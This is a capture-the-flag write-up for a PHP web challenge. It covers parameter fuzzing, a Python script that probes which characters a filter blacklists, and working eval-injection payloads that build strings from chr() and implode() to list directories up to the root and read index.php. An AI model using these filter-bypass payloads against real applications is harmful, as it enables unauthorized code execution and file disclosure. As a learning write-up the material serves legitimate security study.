casual-defence

Info	Details
Category	Web Exploitation
Difficulty	Medium

Challenge Overview

The application exposed:

index.php?cmd=

At first, I performed directory brute-forcing using:

• dirsearch

• gobuster with common and big wordlists

No interesting endpoints or hidden directories were discovered.

After that, I shifted focus to parameter fuzzing. Using Burp Intruder with the burp-parameter-names (located in SecsList/Discovery/Web-Content) wordlist against:

index.php?FUZZ=

I discovered the hidden parameter:

index.php?cmd=

To better understand input filtering, I wrote a small Python script to determine which characters were blacklisted in ?cmd=:

import requests
import string

url = "http://34.179.171.239:32559/index.php?cmd="

blacklisted = []
non_blacklisted = []
characters = string.printable

for char in characters:
    response = requests.get(url + char)
    if "Try Harder!" in response.text:
        blacklisted.append(char)
    else:
        non_blacklisted.append(char)

print("bl", "".join(blacklisted))
print("nonbl", "".join(non_blacklisted))

This allowed me to clearly identify which characters triggered the filter and which were allowed, which was crucial for building payloads later.

Initial manual attempts:

cat flag.txt      → Try Harder!
cat *             → Try Harder!
id / ls / env     → HTTP 500

However:

?cmd=echo chr(65);

Returned:

A

This confirmed the backend was executing:

eval($_GET['cmd']);

This was PHP Code Injection via eval(), not shell command injection.

The key difference:

• eval() → executes PHP code

• system()/exec() → execute OS shell commands

So exploitation had to be done using PHP functions, not Bash.

---

Exploitation

Bypassing the Blacklist

From the character testing script, I identified that characters such as:

• .

• $

• quotes

• /

were blocked.

So direct string usage was impossible.

Solution: construct strings dynamically using chr() + implode()

Example:

implode(array(chr(105),chr(110),chr(100),chr(101),chr(120)))

Equivalent to:

"index"

This bypassed the need for:

• string literals

• concatenation operator .

• variables

---

Directory Enumeration

Current directory:

print_r(scandir(implode(array(chr(46)))));

Equivalent to:

scandir(".")

Output:

index.php
phpinfo.php~

Traversal upward:

scandir("..")
scandir("../..")

Eventually reaching /:

bin, boot, dev, etc, home, root, tmp, var, ...

Classic container structure.

---

File Reading

To read a file:

print_r(file_get_contents(implode(array(
chr(105),chr(110),chr(100),chr(101),chr(120),chr(46),chr(112),chr(104),chr(112)))));

Equivalent to:

file_get_contents("index.php");

After that, using View Page Source (Ctrl + U), the flag was found inside a comment in index.php.

---

Key functions used

• scandir()

• readfile()

• file_get_contents()

• implode()

• chr()

Reference for dangerous PHP functions: https://gist.github.com/mccabe615/b0907514d34b2de088c4996933ea1720

---

Key Takeaways

• This was eval injection, not command injection.

• In eval contexts, think in PHP primitives, not shell.

• implode(array(chr(...))) is a powerful blacklist bypass technique. Like .join in python

• scandir() behaves like ls -a.

• readfile() outputs directly; file_get_contents() returns a string.

• When brute-forcing fails, parameter fuzzing and character analysis can reveal the real attack surface.

made by k0d